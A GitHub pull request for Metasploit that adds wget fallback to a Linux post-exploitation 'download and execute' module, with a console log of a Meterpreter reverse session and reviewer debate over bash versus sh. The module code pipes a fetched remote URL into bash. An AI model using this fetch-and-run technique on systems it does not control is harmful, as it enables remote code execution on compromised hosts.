Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

wget support for post/linux/manage/download_exec #1622

Merged
merged 1 commit into from Mar 21, 2013
Merged

wget support for post/linux/manage/download_exec #1622

merged 1 commit into from Mar 21, 2013

Conversation

dougsko
Copy link
Contributor

@dougsko dougsko commented Mar 21, 2013

The module looks for wget in $PATH if curl isn't found.

msf post(download_exec) > info

       Name: Linux Download Exec
     Module: post/linux/manage/download_exec
    Version: 0
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Joshua D. Abraham <jabra@praetorian.com>

Description:
  This module downloads and runs a file with bash. It first tries to 
  uses curl as its HTTP client and then wget if it's not found. Bash 
  found in the PATH is used to execute the file.

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.136:4444
[*] Starting the payload handler...
msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.136:4444 -> 10.0.0.100:41524) at 2013-03-21 00:02:02 -0400

msf exploit(handler) > use post/linux/manage/download_exec
msf post(download_exec) > set session 1
session => 1
msf post(download_exec) > set url 'http://pastebin.com/raw.php\?i=RkVqNudD'
url => http://pastebin.com/raw.php\?i=RkVqNudD
msf post(download_exec) > show options

Module options (post/linux/manage/download_exec):

   Name     Current Setting                          Required  Description
   ----     ---------------                          --------  -----------
   SESSION  1                                        yes       The session to run this module on.
   URL      http://pastebin.com/raw.php\?i=RkVqNudD  yes       Full URL of file to download.

msf post(download_exec) > exploit

[*] Checking if curl exists in the path...
[!] curl not available on the $PATH, checking for wget...
[*] Checking if wget exists in the path...
[+] wget available, going ahead...
[*] 10.1.0.25 - Meterpreter session 1 closed.  Reason: Died
[-] Post interrupted by the console user
[*] Post module execution completed
msf post(download_exec) >

kernelsmith
kernelsmith reviewed Mar 21, 2013
View reviewed changes
modules/post/linux/manage/download_exec.rb
end

if datastore['URL'].match(/https/)
cmd_exec_vprint("`which curl` -k #{datastore['URL']} 2>/dev/null | `which bash` ")
cmd_exec_vprint("`which #{http_client}` #{stdout_option} #{ssl_option} #{datastore['URL']} 2>/dev/null | `which bash` ")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is there any reason why bash is preferred vs plain old sh? As far as I can tell, looking for bash just reduces your success rate, for instance a busybox-based embedded device doesn't have bash, but it does have sh. ESXi is also a good example, the only shell on there (also busybox-based) is ash, to which /bin/sh is linked iirc.

@jvazquez-r7 jvazquez-r7 mentioned this pull request Mar 21, 2013
Merged
@jvazquez-r7
Copy link
Contributor

Hi @dougsko,

Thanks for the addition, I've added pull request to your branch for cleanup

dougsko#2

Feel free to review, test and discuss anything, once you feel comfortable with changes, merge it into your repo and this pull request will be automatically updated :)

Test after changes:

msf post(download_exec) > use post/linux/manage/download_exec 
msf post(download_exec) > run

[*] Checking if curl exists in the path...
[*] Checking if wget exists in the path...
[+] wget available, using it
[*] Post module execution completed

@jvazquez-r7
Copy link
Contributor

@kernelsmith , the original pull request by @jasbro ( #1596 ) was using bash, since it's included normally in linux distributions, and at lot of them sh points to bash indeed, it was fine for me.

Really was not having into account embedded devices point of view, which is true normally use sh I guess because is "smaller" than bash. On the other hand I ask myself how many embedded devices have curl and/or wget available.... Still I dont have a strong opinion about using bash or sh here... are there more opinions about the topic?

@jasbro, do you have something more to say here?

@kernelsmith thanks for pointing the topic! Nice discussion :)

@todb-r7
Copy link

todb-r7 commented Mar 21, 2013

BusyBox does, indeed, ship with wget, and does not ship with bash. Check it:

http://www.busybox.net/live_bbox/live_bbox.html

So 👍 for sh over bash.

@jabra-
Copy link
Contributor

jabra- commented Mar 21, 2013

I think we should use bash if it exists and if not, drop to sh.
On Mar 21, 2013 8:30 AM, "Tod Beardsley" notifications@github.com wrote:

BusyBox does, indeed, ship with wget, and does not ship with bash. Check
it:

http://www.busybox.net/live_bbox/live_bbox.html

So [image: 👍] for sh over bash.


Reply to this email directly or view it on GitHubhttps://github.com//pull/1622#issuecomment-15233562
.

@jvazquez-r7
Copy link
Contributor

Oka! Let me merge this at this moment, since bash vs sh is not related to this pull request, and I'm going to open a new pull request which will switch to sh if bash isn't available :) Will be referencing this PR in the new PR.

Thanks @dougsko for PR and merging changes! Merging it!

Meatballs1
Meatballs1 reviewed Mar 21, 2013
View reviewed changes
modules/post/linux/manage/download_exec.rb
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Download Exec',
'Name' => 'Linux Manage Download and Exececute',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Execute

@jvazquez-r7
Copy link
Contributor

btw, @todb-r7 , I guess busybox is configurable, so the number of binaries/components changes from embedded device to embedded device

@jvazquez-r7 jvazquez-r7 merged commit b7ee9e5 into rapid7:master Mar 21, 2013
@jvazquez-r7 jvazquez-r7 mentioned this pull request Mar 21, 2013
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
6 participants
@dougsko @jvazquez-r7 @todb-r7 @jabra- @kernelsmith @Meatballs1